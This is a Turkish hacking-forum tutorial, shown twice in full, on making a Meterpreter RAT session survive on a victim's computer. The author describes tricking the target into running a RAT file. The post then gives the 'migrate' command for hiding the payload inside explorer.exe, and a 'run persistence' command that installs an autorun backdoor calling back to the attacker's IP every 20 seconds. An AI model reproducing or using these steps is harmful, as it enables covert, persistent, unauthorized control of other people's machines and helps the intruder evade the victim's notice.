Arkadaşlar Merhaba
Bugün bilmeyenlerin çok işine yarayacak bir konu olan meterpreter sezonunu kalıcı kılmayı anlatacağım.
Meterpreter RAM üzerinde çalışan bir RAT türüdür.
RAM üzerinde çalışması onun hiçbir kalıntı bırakmaması için çok önemlidir.
Ama RAM üzerinde çalışmanın bir kötü yanı var.
Cihaz kendisini sıfırlayınca meterpreter sezonuda otamatikmen iptal oluyor.(Tabi geri açılmadığı sürece)
Bizde meterpreterin kalıcılığını arttırmak için belli yollar kullanıyoruz.
İsterseniz başlayalım.
İlk olarak bir meterpreter sezonu elde etmemiz lazım.(Eğer hiç bir bilginiz yoksa nasıl açılıcağı hakkında, diğer konuların açıklayıcı olacaktır.)
Ben normal olarak karşı tarafa dosya aracılığı ile RAT attım ve çalıştırılmasını sağladım.
![](https://i.hizliresim.com/Ln37XV.png)
Meterpreter sezonumuz açık durumda.
Karşı cihazda eğer çalışan işlemlere bakılırsa oarada rahatlıkla bizim RATımızın çalıştığı görünecektir.(8mb lık bir RAM hafızasını işgal etmiş durumda)
![](https://i.hizliresim.com/r29BaP.png)
Karşı taraf bir paranoyak olabilir ve her dakika başı görev yöneticisini kontrol ediyor ise bizi rahatlıkla fark edebilir.
Bunu alt etmek için RATımızı başka bir uygulamaya transfer etmemiz yeterlidir.
İlk olarak ps komutunu girerek çalışan işlemleri görüyoruz.
![](https://i.hizliresim.com/7NvEpl.png)
Burada görüldüğü üzere belli işlemler yürümekte.
Biz buradan öyle bir işlem seçicezki karşı tarafın kapatacağı en son şey olsun.
Tabiki windows bilgisayarlar için bu explorer olacaktır.(Linux cihazlarda gnome-desktop, plasmashell, Xorg gibi işlemler olabilir)
Seçtiğimiz işlemin id numarasını alıp bunu işlemde kullanıcaz.(explorer 1544 nolu idye sahip)
migrate 1544
![](https://i.hizliresim.com/PrM4A8.png)
Evet başarılı bir sonuç aldığınızda böyle bir çıktı gelecektir.
Şimdi isterseniz yeniden çalışan işlmelere bakalım.
![](https://i.hizliresim.com/gWozDN.png)
Evet RATımız şuan gözükmemekte.
Bu kullanıcının fark etmesine yönelik kalıcılaştırma yöntemi idi.
Peki ya bahsettiğimiz gibi cihazı kapatıp açarsa.
Ozamanda olaya persistence adındaki postumuz giriyor.
Persistence karşı tarafa autorunla birlikte bir tane daha RAT yollar ve bunu bize yönlendirir.
run persistence -A -i 20 -p 4441 -r 192.168.1.25 -U ****sploitable
![](https://i.hizliresim.com/ZEdgqg.png)
Evet komutumuzu girdikten sonra kontrol amaçlı bir tane daha sezon açıyor ve işlemimiz tamamlanıyor.
Persistence ile bilgi
-A parametresi RAT işleve geçtiğinde gelmesi gerektiğini belirtir.
-i RATımız bize ilk kısımdan ulaşamadı diyelim bunu 20 saniye aralıklarla tekrarlayarak bize ulaşması gerektiğini belirtiyor.
-p bize ulaşacağı portu belirtiyoruz.
-r bize ulaşacağı ip adresini seçiyoruz.
-U bu işleme mağruz kalıcak kullanıcının adını belirtiyoruz.
Okuduğunuz için teşşekkür ederim
Eğer beğendiseniz teşşekkür atmayı unutmayın.
Diğer konularıma burdan ulaşabilirsiniz:
http://www.turkhackteam.org/search.php?searchid=10446642
:RpS_thumbsup:HEPİNİZ USTA BİR HACKERSINIZ, TABİ ÖĞRENMEK İSTERSENİZ.:RpS_thumbsup:
Bugün bilmeyenlerin çok işine yarayacak bir konu olan meterpreter sezonunu kalıcı kılmayı anlatacağım.
Meterpreter RAM üzerinde çalışan bir RAT türüdür.
RAM üzerinde çalışması onun hiçbir kalıntı bırakmaması için çok önemlidir.
Ama RAM üzerinde çalışmanın bir kötü yanı var.
Cihaz kendisini sıfırlayınca meterpreter sezonuda otamatikmen iptal oluyor.(Tabi geri açılmadığı sürece)
Bizde meterpreterin kalıcılığını arttırmak için belli yollar kullanıyoruz.
İsterseniz başlayalım.
İlk olarak bir meterpreter sezonu elde etmemiz lazım.(Eğer hiç bir bilginiz yoksa nasıl açılıcağı hakkında, diğer konuların açıklayıcı olacaktır.)
Ben normal olarak karşı tarafa dosya aracılığı ile RAT attım ve çalıştırılmasını sağladım.
![](https://i.hizliresim.com/Ln37XV.png)
Meterpreter sezonumuz açık durumda.
Karşı cihazda eğer çalışan işlemlere bakılırsa oarada rahatlıkla bizim RATımızın çalıştığı görünecektir.(8mb lık bir RAM hafızasını işgal etmiş durumda)
![](https://i.hizliresim.com/r29BaP.png)
Karşı taraf bir paranoyak olabilir ve her dakika başı görev yöneticisini kontrol ediyor ise bizi rahatlıkla fark edebilir.
Bunu alt etmek için RATımızı başka bir uygulamaya transfer etmemiz yeterlidir.
İlk olarak ps komutunu girerek çalışan işlemleri görüyoruz.
![](https://i.hizliresim.com/7NvEpl.png)
Burada görüldüğü üzere belli işlemler yürümekte.
Biz buradan öyle bir işlem seçicezki karşı tarafın kapatacağı en son şey olsun.
Tabiki windows bilgisayarlar için bu explorer olacaktır.(Linux cihazlarda gnome-desktop, plasmashell, Xorg gibi işlemler olabilir)
Seçtiğimiz işlemin id numarasını alıp bunu işlemde kullanıcaz.(explorer 1544 nolu idye sahip)
migrate 1544
![](https://i.hizliresim.com/PrM4A8.png)
Evet başarılı bir sonuç aldığınızda böyle bir çıktı gelecektir.
Şimdi isterseniz yeniden çalışan işlmelere bakalım.
![](https://i.hizliresim.com/gWozDN.png)
Evet RATımız şuan gözükmemekte.
Bu kullanıcının fark etmesine yönelik kalıcılaştırma yöntemi idi.
Peki ya bahsettiğimiz gibi cihazı kapatıp açarsa.
Ozamanda olaya persistence adındaki postumuz giriyor.
Persistence karşı tarafa autorunla birlikte bir tane daha RAT yollar ve bunu bize yönlendirir.
run persistence -A -i 20 -p 4441 -r 192.168.1.25 -U ****sploitable
![](https://i.hizliresim.com/ZEdgqg.png)
Evet komutumuzu girdikten sonra kontrol amaçlı bir tane daha sezon açıyor ve işlemimiz tamamlanıyor.
Persistence ile bilgi
-A parametresi RAT işleve geçtiğinde gelmesi gerektiğini belirtir.
-i RATımız bize ilk kısımdan ulaşamadı diyelim bunu 20 saniye aralıklarla tekrarlayarak bize ulaşması gerektiğini belirtiyor.
-p bize ulaşacağı portu belirtiyoruz.
-r bize ulaşacağı ip adresini seçiyoruz.
-U bu işleme mağruz kalıcak kullanıcının adını belirtiyoruz.
Okuduğunuz için teşşekkür ederim
Eğer beğendiseniz teşşekkür atmayı unutmayın.
Diğer konularıma burdan ulaşabilirsiniz:
http://www.turkhackteam.org/search.php?searchid=10446642
:RpS_thumbsup:HEPİNİZ USTA BİR HACKERSINIZ, TABİ ÖĞRENMEK İSTERSENİZ.:RpS_thumbsup: